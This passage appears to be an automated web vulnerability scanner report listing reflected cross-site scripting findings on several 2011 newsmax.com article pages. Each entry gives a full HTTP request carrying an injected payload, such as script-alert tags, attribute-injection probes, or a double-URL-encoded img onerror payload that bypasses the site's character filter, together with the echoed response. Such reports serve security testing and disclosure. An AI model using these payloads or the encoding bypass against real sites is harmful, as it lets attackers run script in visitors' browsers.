<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?c7a7f'><script>alert(1)</script>5a04eb222fb=1' class="article_tools_link"> ...[SNIP]...
1.16. http://www.newsmax.com/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload eae9b"><script>alert(1)</script>e60bdf8e5f5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 46591 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Bulim ...[SNIP]... <a href="javascript:fwdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/Bulimia-treatment-centers-symptoms/2011/03/17/id/371701?eae9b"><script>alert(1)</script>e60bdf8e5f5=1')" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 6f36c'%20a%3db%209c59266b336 was submitted in the REST URL parameter 2. This input was echoed as 6f36c' a=b 9c59266b336 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c'%20a%3db%209c59266b336/2011/03/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:22 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV6f36c' a=b 9c59266b336/2011/03/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 625a6'%20a%3db%203c060553950 was submitted in the REST URL parameter 3. This input was echoed as 625a6' a=b 3c060553950 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6'%20a%3db%203c060553950/03/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011625a6' a=b 3c060553950/03/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7aca5'%20a%3db%2043ce35206ee was submitted in the REST URL parameter 4. This input was echoed as 7aca5' a=b 43ce35206ee in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5'%20a%3db%2043ce35206ee/18/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:43 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/037aca5' a=b 43ce35206ee/18/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 650ed'%20a%3db%20c4f3c295575 was submitted in the REST URL parameter 5. This input was echoed as 650ed' a=b c4f3c295575 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed'%20a%3db%20c4f3c295575/id/389912 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45710 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18650ed' a=b c4f3c295575/id/389912' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 93798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e was submitted in the REST URL parameter 7. This input was echoed as 93798"><img src=a onerror=alert(1)>4bf8f812a6e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991293798%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253e4bf8f812a6e HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42174 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:14 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href="javascript:printPage(38991293798"><img src=a onerror=alert(1)>4bf8f812a6e);" class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 63b74'%20a%3db%202a564a64376 was submitted in the REST URL parameter 7. This input was echoed as 63b74' a=b 2a564a64376 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74'%20a%3db%202a564a64376 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 41730 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:17 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> Newsm ...[SNIP]... <a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/38991263b74' a=b 2a564a64376' class="article_tools_link"> ...[SNIP]...
1.23. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 91767"><script>alert(1)</script>440de3016dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45937 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:50 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... wdpopup('http://www.newsmax.com/ForwardToFriend?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?91767"><script>alert(1)</script>440de3016dd=1')" class="article_tools_link"> ...[SNIP]...
1.24. http://www.newsmax.com/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1cd1b'><script>alert(1)</script>051994016ee was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45932 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:12:52 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> HPV: ...[SNIP]... a href='http://www.newsmax.com/contact/editors/?articleurl=/FastFeatures/HPVtreatmentcentersHPVtreatmentcentertreatmentcentersforHPVtheHPVtreatmentcenterresidentialtreatmentforHPV/2011/03/18/id/389912?1cd1b'><script>alert(1)</script>051994016ee=1' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 44a6d'%20a%3db%20ed277f82d16 was submitted in the REST URL parameter 2. This input was echoed as 44a6d' a=b ed277f82d16 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d'%20a%3db%20ed277f82d16/2011/03/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:25 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... smax.com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-44a6d' a=b ed277f82d16/2011/03/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 49a3c'%20a%3db%203b54920ef53 was submitted in the REST URL parameter 3. This input was echoed as 49a3c' a=b 3b54920ef53 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c'%20a%3db%203b54920ef53/03/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... com/contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/201149a3c' a=b 3b54920ef53/03/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1c200'%20a%3db%20f3dc1d27183 was submitted in the REST URL parameter 4. This input was echoed as 1c200' a=b f3dc1d27183 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200'%20a%3db%20f3dc1d27183/18/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... /contact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/031c200' a=b f3dc1d27183/18/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f18c1'%20a%3db%20df36caabad1 was submitted in the REST URL parameter 5. This input was echoed as f18c1' a=b df36caabad1 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1'%20a%3db%20df36caabad1/id/389917 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 45965 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:13:53 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> 10 Be ...[SNIP]... ntact/editors/?articleurl=/FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18f18c1' a=b df36caabad1/id/389917' class="article_tools_link"> ...[SNIP]...
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 was submitted in the REST URL parameter 7. This input was echoed as 75ff3"><img src=a onerror=alert(1)>a2bddf3f416 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.
Request
GET /FastFeatures/Romanticgesturesforvalentinesdayromanticgesturesforguyssweetromanticgesturesromanticgesturesthatcostnothingfreeromanticgesturesromanticgesturesforher-/2011/03/18/id/38991775ff3%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253ea2bddf3f416 HTTP/1.1 Host: www.newsmax.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: popunder=yes; __utmz=74878349.1300542526.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); OAX=rcHW802EtDQACEFj; __utma=74878349.2019612555.1300542526.1300542526.1300542526.1; __utmc=74878349; __utmb=74878349; RMFD=011Q0wWCO103C6qe|O103C7KL|O103C7r2; ASP.NET_SessionId=w5vh4q55xqon4a454e0vux45; CMSPreferredCulture=en-US;
Response
HTTP/1.1 200 OK Cache-Control: no-cache,private, no-store, must-revalidate Content-Length: 42570 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.0 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET X-UA-Compatible: IE=7 Date: Sat, 19 Mar 2011 14:14:29 GMT Connection: close
